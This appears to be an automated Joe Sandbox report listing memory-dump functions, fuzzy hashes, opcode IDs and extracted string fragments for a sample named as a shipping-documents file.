Source File: 00000000.00000002.4539560556.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73d0000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5654b1eed0557bb1aa6a30dc337a4c07ac5e89ac934e68c09c0c61daba3ddd8
Instruction ID: 2bd1e1befe552214fd5c2f1b545a35e4c63be8a3ff8a7bc9542d361b0bc98ecc
Opcode Fuzzy Hash: c5654b1eed0557bb1aa6a30dc337a4c07ac5e89ac934e68c09c0c61daba3ddd8
Instruction Fuzzy Hash: DBC14DB2E002598FEB14CFA5D98079EBBB2BF88310F15C1AAD409AB255E734DD85CF51

Function 073D1A29 Relevance: .3, Instructions: 279COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4539560556.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73d0000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fe0f28c515759dff3494b33cc54d5e05514ea6deab86c11acc81018a563570f
Instruction ID: 83dc073839be5e28fd13b89d24ce5ac08537fb4e2284eecf76dd0584665bb5ad
Opcode Fuzzy Hash: 5fe0f28c515759dff3494b33cc54d5e05514ea6deab86c11acc81018a563570f
Instruction Fuzzy Hash: BAC14DB2D002198FEB14CFA5E98079EBBB2BF88310F15C1AAD449AB255E734DD85CF51

Function 0A159A18 Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4541392787.000000000A150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a150000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 707506588ee9673e0623e4e49612199bf985e1a777d1231b88e8fe3576b1560f
Instruction ID: d28f7e29cb7f9cc0f291ce29b38e2221b555488059f8fed61b7e32698c635f6b
Opcode Fuzzy Hash: 707506588ee9673e0623e4e49612199bf985e1a777d1231b88e8fe3576b1560f
Instruction Fuzzy Hash: 86D1CE75E01218CFDB54DFA5D984B9DBBB2FF89300F2080A9D819AB365DB349A85CF10

Function 0446D788 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535347905.0000000004460000.00000040.00000800.00020000.00000000.sdmp, Offset: 04460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4460000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a82ef7350871986011bb608d107425a2ece09d0c4436a6fa61da5d18462b544
Instruction ID: 928d25e983c480bb3b3e27ae6629efe2cc09359b7707c477fa31ebdff9372ed8
Opcode Fuzzy Hash: 5a82ef7350871986011bb608d107425a2ece09d0c4436a6fa61da5d18462b544
Instruction Fuzzy Hash: 8DC1C374E01218CFDB54DFA5D944B9DBBB2BF89300F1080AAD809AB359DB35AD85CF11

Function 0A158C52 Relevance: .2, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4541392787.000000000A150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a150000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15268e9a88885be7bedbcde59c8fb063bf285f0de9efd9af8a2f993904161018
Instruction ID: 3d2f1c158d37f8d954702f84775c1b2fca8e3c11a07c0a5e87ab73a0a963e11b
Opcode Fuzzy Hash: 15268e9a88885be7bedbcde59c8fb063bf285f0de9efd9af8a2f993904161018
Instruction Fuzzy Hash: 99A19175E01218CFEB68CF6AC984BDDBBF2AB89300F14C1A9D818A7254DB745A85CF51

Function 0A159332 Relevance: .2, Instructions: 225COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4541392787.000000000A150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a150000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2001c9f355ed9951e1c0a9aa852af81c0304c0e6e5369d11935fdcf9f4a1c771
Instruction ID: c8d03d59a23983e5bc56573f0a44c2b1db96323fe9bd7653aeee56229089cb41
Opcode Fuzzy Hash: 2001c9f355ed9951e1c0a9aa852af81c0304c0e6e5369d11935fdcf9f4a1c771
Instruction Fuzzy Hash: 30A19375D01219CFEB68CF6AC944BDDBBF2AF89300F14C1AAD818A7254DB745A85CF11

Function 0A159FF0 Relevance: .2, Instructions: 225COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4541392787.000000000A150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a150000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1eda98197146c2b5e4989b048f7b2bd4dec9f49e7f8c6c8b8c8217ac232cace9
Instruction ID: 2d4e928b87c09f8f614a018c5cdae2b23054c9e66659efcb78f23f9e49ca100c
Opcode Fuzzy Hash: 1eda98197146c2b5e4989b048f7b2bd4dec9f49e7f8c6c8b8c8217ac232cace9
Instruction Fuzzy Hash: 28A11670D00208CFEB14DFA8C988BDDBBB1FF89314F208269E419AB291DB749985CF55

Function 0A15A000 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4541392787.000000000A150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a150000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 785a6ee2e415cdf119c30b64650278d3543289f4a89554840ccc64d2b57b4117
Instruction ID: e19bb86e5b6eff4a77e4643d8c8110acc7f5e3f15e220d7d50102abb0bcd3237
Opcode Fuzzy Hash: 785a6ee2e415cdf119c30b64650278d3543289f4a89554840ccc64d2b57b4117
Instruction Fuzzy Hash: 7EA11670D00208CFEB14DFA8C988BDDBBB1FF89314F208269E419AB291DB749985CF55

Function 044D7E70 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535763913.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_44d0000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce7946d4319c14d3c24c12a4c05c9f80c3b6aae4fc33e3f870d70bb0dce71af6
Instruction ID: 46bf50f93a4482251a424dcb0bcd809d478055eb31f3cc1a6375bf1dc4c41882
Opcode Fuzzy Hash: ce7946d4319c14d3c24c12a4c05c9f80c3b6aae4fc33e3f870d70bb0dce71af6
Instruction Fuzzy Hash: 9CA19275E01219CFEB68DF6AC954B9EFBF2AF88300F14C1AAD408A7254DB745A85CF11

Function 044D9A08 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535763913.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_44d0000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1e4ccc8c77d8174606fa506aa3c9d4de86ef4216ba5b37bbab5d9174c72ceef
Instruction ID: 190fdd074ec74fffa68e85cd009f982cdcf757d3b6177611b87bef4f1b67e6fd
Opcode Fuzzy Hash: f1e4ccc8c77d8174606fa506aa3c9d4de86ef4216ba5b37bbab5d9174c72ceef
Instruction Fuzzy Hash: 6CA195B5E012188FEB68CF6AC954B9DBBF2BF89300F14C1AAD408A7254DB745A85CF51

Function 044D8C38 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535763913.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_44d0000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 977a9174afeb48e5cd60dbbb7340ee5e4ce69a8092686cf25f4713bd23d2251c
Instruction ID: 31a5c67fd186513aed9e3a8a752d14cb1255952cd476d51a6f6a489ce04761a7
Opcode Fuzzy Hash: 977a9174afeb48e5cd60dbbb7340ee5e4ce69a8092686cf25f4713bd23d2251c
Instruction Fuzzy Hash: F1A1A475E012188FEB68DF6AC954B9EFBF2AF89300F14C0AAD408A7254DB745A85CF11

Function 044DA0F0 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535763913.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_44d0000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b06d843d747e6089bb03f60121bfd33ff59d52d87e74b1009f6c091ed3911e00
Instruction ID: f88bdaaff94147a04ebf30885a9e9d57dea5857be97fbde79ca4ffd91a375e09
Opcode Fuzzy Hash: b06d843d747e6089bb03f60121bfd33ff59d52d87e74b1009f6c091ed3911e00
Instruction Fuzzy Hash: 45A1A275E01219CFEB68CF6AC954B9EFBF2AB88300F14C1AAD408B7254DB745A85CF11

Function 044D9320 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535763913.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_44d0000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a0c09153183d83c7e73987025b242f47b005b4a1ea3039b4b95309f91d7bdb9
Instruction ID: 755480dcbd61397a7de6425f3746bdfa0012a02b55aa31270c6681b36606bf27
Opcode Fuzzy Hash: 4a0c09153183d83c7e73987025b242f47b005b4a1ea3039b4b95309f91d7bdb9
Instruction Fuzzy Hash: 5CA1A4B5E012198FEB64CF6AC954B9EFBF2AF89300F14C1AAD408A7254DB745A85CF11

Function 044D8558 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535763913.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_44d0000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14ffd7a8e931ebea9301ce76578d73de6837fd5d71386b6e14246c215bb22ccb
Instruction ID: 2947705cd6506473f6702fe510819a3cb8f05cef20a08ea26d523a5a21366118
Opcode Fuzzy Hash: 14ffd7a8e931ebea9301ce76578d73de6837fd5d71386b6e14246c215bb22ccb
Instruction Fuzzy Hash: EAA1B375E01218CFEB68DF6AC954B9EFBF2AF88300F14C1AAD408A7250DB705A85CF51

Function 044DA7D8 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535763913.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_44d0000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b3c72837ee73355e221767ed7f736b66c266cad6f3d978932f1574ca3624621
Instruction ID: e176fe73e09d7dab07193e0f555bf594f62969f9f0271ba49b8f979890f22205
Opcode Fuzzy Hash: 5b3c72837ee73355e221767ed7f736b66c266cad6f3d978932f1574ca3624621
Instruction Fuzzy Hash: 62A1A275E012188FEB68CF6AC954B9EFBF2AF89300F14C1AAD408B7254DB745A85CF51

Function 0A15A346 Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4541392787.000000000A150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a150000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 466bbd1e73b08156d271f63db6faa9c9aaf623d0452dbdbaf2c6aa50515a1153
Instruction ID: d22fad6f781a6cc8f9121b6ae6753d353fd8663835d7eea48e4375dbe048d44a
Opcode Fuzzy Hash: 466bbd1e73b08156d271f63db6faa9c9aaf623d0452dbdbaf2c6aa50515a1153
Instruction Fuzzy Hash: 1B910470D00208CFEB54DFA8C988BDDBBB1FF49314F249269E419AB2A1DB749985CF15

Function 044D8548 Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535763913.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_44d0000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afba6e214a160d6f2d87074c801409dd5aaa61351abd330eb7a65db643b4fcd7
Instruction ID: 1a2569bfa302b90658ef63382391d905f9deb48f118362c8bd3cb4a63bdd08fb
Opcode Fuzzy Hash: afba6e214a160d6f2d87074c801409dd5aaa61351abd330eb7a65db643b4fcd7
Instruction Fuzzy Hash: 63819671E016198FEB68DF6AC954BDEFBF2BF88300F14C1AAD408A7254DB705A858F51

Function 044DA7C9 Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535763913.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_44d0000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 025a7d2f85282a84e790aad4d78508fc19cda71a093cf39008b8c851011f06a2
Instruction ID: 721f764c8cc3d6a83923361892f7faa1ee398279f1d9fb52c371c99673b1770c
Opcode Fuzzy Hash: 025a7d2f85282a84e790aad4d78508fc19cda71a093cf39008b8c851011f06a2
Instruction Fuzzy Hash: 2C819571E016188FEB68CF6AC954B9EBBF2BF88300F14C1EAD508A7254DB745A85CF51

Function 0A156908 Relevance: .2, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4541392787.000000000A150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a150000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 318372357eee766eb7a8dc1d467fb4417052cfe99809ffa2f50a655a28f687b8
Instruction ID: 25e237d1d678dc4fbd58cb89d546a9d9ff4772e147aa2252284b99e781c0a413
Opcode Fuzzy Hash: 318372357eee766eb7a8dc1d467fb4417052cfe99809ffa2f50a655a28f687b8
Instruction Fuzzy Hash: B151B674E00208DFDB18DFAAD984A9DBBB6BF88300F14D029E815AB365DB349845CF54

Function 0A156918 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4541392787.000000000A150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a150000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebd1b24a09ffd55536551735fdf40d7cd289e77eb6543abd134dfa144bb0bc40
Instruction ID: 952551cc7e5184fb2ce65b15e83d2e25b365dee8d2e6c8383b682c9099f01612
Opcode Fuzzy Hash: ebd1b24a09ffd55536551735fdf40d7cd289e77eb6543abd134dfa144bb0bc40
Instruction Fuzzy Hash: 22519474E00308DFDB18DFAAD584A9DBBF6BF89300F249029E819AB365DB349945CF54

Function 0446EE68 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535347905.0000000004460000.00000040.00000800.00020000.00000000.sdmp, Offset: 04460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4460000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c21155edc1bd459a7c2b3b048dad759227a3184ec357d3432151d3efa2dc2218
Instruction ID: cddd7fbf0ddf12572968414c5c232416536231aeaa88473430c3fdc21d1548c2
Opcode Fuzzy Hash: c21155edc1bd459a7c2b3b048dad759227a3184ec357d3432151d3efa2dc2218
Instruction Fuzzy Hash: 3641F2B0D012088BEB18DFAAD9547DEBBF2BF89304F20D06AC459BB254DB355946CF11

Function 044D9311 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535763913.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_44d0000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca384c3ea47d2e619f708deaca63594e9e612f28c68e7de099a4f1e1b684a0fe
Instruction ID: 45cd45056fddadda0e8c850fb6f9a80bc39052aadf00db19b9c7200fb01251f7
Opcode Fuzzy Hash: ca384c3ea47d2e619f708deaca63594e9e612f28c68e7de099a4f1e1b684a0fe
Instruction Fuzzy Hash: 81414AB1E016188BEB68CF5BD9547DEFAF3AFC9304F14C1AAC40CA6254EB7509868F51

Function 044DA0E0 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535763913.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_44d0000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 352491dcf55bda5754d56e067d17f8f959bd3627dad2aab6db7a010802a71352
Instruction ID: edc415b761ba4f256d96251b29b4ba2efce17454f0ba8d93439ebd5ed0347da5
Opcode Fuzzy Hash: 352491dcf55bda5754d56e067d17f8f959bd3627dad2aab6db7a010802a71352
Instruction Fuzzy Hash: 2B4159B1E016188BEB68CF5BD9447DEFAF3AFC8204F14C1A9C40CA6254EB7509868F51

Function 044D8C27 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535763913.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_44d0000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a0c2a1547222a725887ee827a3badb6d5f46e595a17257b20a2425fb1fe3daa
Instruction ID: 33407cf2b4a7677a16ed7426e07ef10eba79c4c016dab931e9e9e38e50704e16
Opcode Fuzzy Hash: 9a0c2a1547222a725887ee827a3badb6d5f46e595a17257b20a2425fb1fe3daa
Instruction Fuzzy Hash: BC415A71E016188BEB68CF6BC9547DEFAF3AFC9304F14C1AAC40CA6254DB7509858F51

Function 044D99F8 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535763913.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_44d0000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6e936ae6b147efad33efe915843edb548eeaf8a07973250a0338bf0643f85bc
Instruction ID: 669bba033eff6967652878aa7c2dc94c4043917ef042ae33d3c1811ed59883ea
Opcode Fuzzy Hash: a6e936ae6b147efad33efe915843edb548eeaf8a07973250a0338bf0643f85bc
Instruction Fuzzy Hash: F0416AB1E016189BEB68CF5BD95479EFAF3AFC8300F14C0BAC40CA6254EB740A858F51

Function 044D7E68 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535763913.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_44d0000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b2d49f691fb75fd62b69a9a0ebab2ce147d9a2dcd796db2eee66615ebd7a07f
Instruction ID: f4a88081dc92133a5242702d08ac49e5f00de825eb24df1d90cc1c21edee0341
Opcode Fuzzy Hash: 5b2d49f691fb75fd62b69a9a0ebab2ce147d9a2dcd796db2eee66615ebd7a07f
Instruction Fuzzy Hash: 2F4159B1E016188BEB68CF6BC9547DEFAF3AFC9304F14C1AAC40CA6254DB7509858F51

Function 0446D778 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535347905.0000000004460000.00000040.00000800.00020000.00000000.sdmp, Offset: 04460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4460000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34bf53080011fcd7c9246ac6bdf7933bdf32af60d5e2344ea88e507a338fcd4a
Instruction ID: 11d5c07d11248111dbbbdc1ff9d45aa570987df2eaf186d220add3d232a70b8a
Opcode Fuzzy Hash: 34bf53080011fcd7c9246ac6bdf7933bdf32af60d5e2344ea88e507a338fcd4a
Instruction Fuzzy Hash: F541F2B4E012488BDB18DFBAC5546DEBBF2AF89300F24D12AC419AB259DB345946CF41

Function 073DB7E9 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4539560556.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73d0000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58778582c19705f84122706f6c83bd30bea63359e76d041a861532c42a0e052c
Instruction ID: 08ea278244d50e2c29eec53b2b4ee175932f04c628fab20fc6cede851dc17be4
Opcode Fuzzy Hash: 58778582c19705f84122706f6c83bd30bea63359e76d041a861532c42a0e052c
Instruction Fuzzy Hash: 9221D4F1D046198BEB18CFAAD8416DEFBF6AFC9300F14C06AC418A7255EB744A468F50

Function 073DB7F8 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4539560556.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73d0000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 123670a8d9c16bb9428afe74b2be9ce28faf36c8f595a2590efa4615985b46c2
Instruction ID: 9b3c42f7d7df49694468a6cb66728b19c85d197e8b71ccdea01fd7ec7d18bfaa
Opcode Fuzzy Hash: 123670a8d9c16bb9428afe74b2be9ce28faf36c8f595a2590efa4615985b46c2
Instruction Fuzzy Hash: 452193B5D046198BEB18CFABD94069EFBF6BFC9300F14C06AC418A7255EB745A468F50

Function 06A9F9B1 Relevance: 10.5, Strings: 8, Instructions: 475
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(o]q, xrefs: 06A9FAD5
(o]q, xrefs: 06A9FAA9
,aq, xrefs: 06A9FE60
(o]q, xrefs: 06A9FEBF
(o]q, xrefs: 06A9FB72
(o]q, xrefs: 06A9FECF
(o]q, xrefs: 06A9F9EE
,aq, xrefs: 06A9FE50

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID: (o]q$(o]q$(o]q$(o]q$(o]q$(o]q$,aq$,aq
API String ID: 0-1435242062
Opcode ID: e4a14fe38da7de44f2218a8076b9b65c867de38420f7d6f9a7efa3af22d3124b
Instruction ID: d617c35a0dd8f48635ef88d793dfe9181c26b66f60bb8b521136ac17bce94eb2
Opcode Fuzzy Hash: e4a14fe38da7de44f2218a8076b9b65c867de38420f7d6f9a7efa3af22d3124b
Instruction Fuzzy Hash: E0125830A006098FCF64DF69D984A9EBBF2BF49314F258599E855DB3A1DB30ED41CB60

Function 0A15B390 Relevance: 6.6, Strings: 5, Instructions: 384
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

8bq, xrefs: 0A15B7D1
Haq, xrefs: 0A15B3DE
Haq, xrefs: 0A15B5D9
Haq, xrefs: 0A15B57A
TJbq, xrefs: 0A15B80A

Memory Dump Source

Source File: 00000000.00000002.4541392787.000000000A150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a150000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID: 8bq$Haq$Haq$Haq$TJbq
API String ID: 0-1597716666
Opcode ID: bb124bd3ebc5e703b3ebb16893c612c6a4afb2903a8a176b63eb247f16cc85fd
Instruction ID: 9025791aa1d9062c4c3634846db13f5e2cb02890c2a9d32674b8afbdd212c916
Opcode Fuzzy Hash: bb124bd3ebc5e703b3ebb16893c612c6a4afb2903a8a176b63eb247f16cc85fd
Instruction Fuzzy Hash: 3FD1D431B082048FDB55DF78C490AAE7BB6EF89320F1544A9E916DB3A1DB34DC46CB91

Function 06A9B0AC Relevance: 5.4, Strings: 4, Instructions: 386
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Xaq, xrefs: 06A9B15E
Xaq, xrefs: 06A9B264
Xaq, xrefs: 06A9B217
Xaq, xrefs: 06A9B198

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID: Xaq$Xaq$Xaq$Xaq
API String ID: 0-4015495023
Opcode ID: dd519050304cabc86e769c309bb8fb9d67c3b453a3ef881167a4288474609274
Instruction ID: 9241141d14fa558560e529ede5d73d1bfdeede8b99168ad24cbcf2183b19b7ee
Opcode Fuzzy Hash: dd519050304cabc86e769c309bb8fb9d67c3b453a3ef881167a4288474609274
Instruction Fuzzy Hash: FAC16631E212289ADF74AE659A427EF77BDEF54250F204165ED07A7214C730CB828EF2

Function 0A15AF00 Relevance: 5.2, Strings: 4, Instructions: 237
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Haq, xrefs: 0A15B1C1
Haq, xrefs: 0A15B15B
, xrefs: 0A15AFED
Haq, xrefs: 0A15B18E

Memory Dump Source

Source File: 00000000.00000002.4541392787.000000000A150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a150000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID: $Haq$Haq$Haq
API String ID: 0-432640594
Opcode ID: b2f7efab0e8e336bf72ad93ce10d4ebbbc7deda21e8e415d23d46212084ea20f
Instruction ID: 1f02979cb2b80ada0b768ca3f7bcd4c2e9ce5f3ca98db4408a938bb7036eda19
Opcode Fuzzy Hash: b2f7efab0e8e336bf72ad93ce10d4ebbbc7deda21e8e415d23d46212084ea20f
Instruction Fuzzy Hash: FE81E235B08204DFDF655F78945826E3AA2EFC6360F258629E932DB2D1DF348D41CB52

Function 0A15AEF0 Relevance: 5.2, Strings: 4, Instructions: 202
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Haq, xrefs: 0A15B1C1
Haq, xrefs: 0A15B15B
Haq, xrefs: 0A15B18E
, xrefs: 0A15AF9D

Memory Dump Source

Source File: 00000000.00000002.4541392787.000000000A150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a150000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID: $Haq$Haq$Haq
API String ID: 0-432640594
Opcode ID: 9dc9a58db92b8ba81f5c74e8339abf5eb19f5193a27122553ed3e60361d456d6
Instruction ID: 08734d8b0f2ff40818c22b00df884baa1c25304b83ffbcce071ad14f86157d88
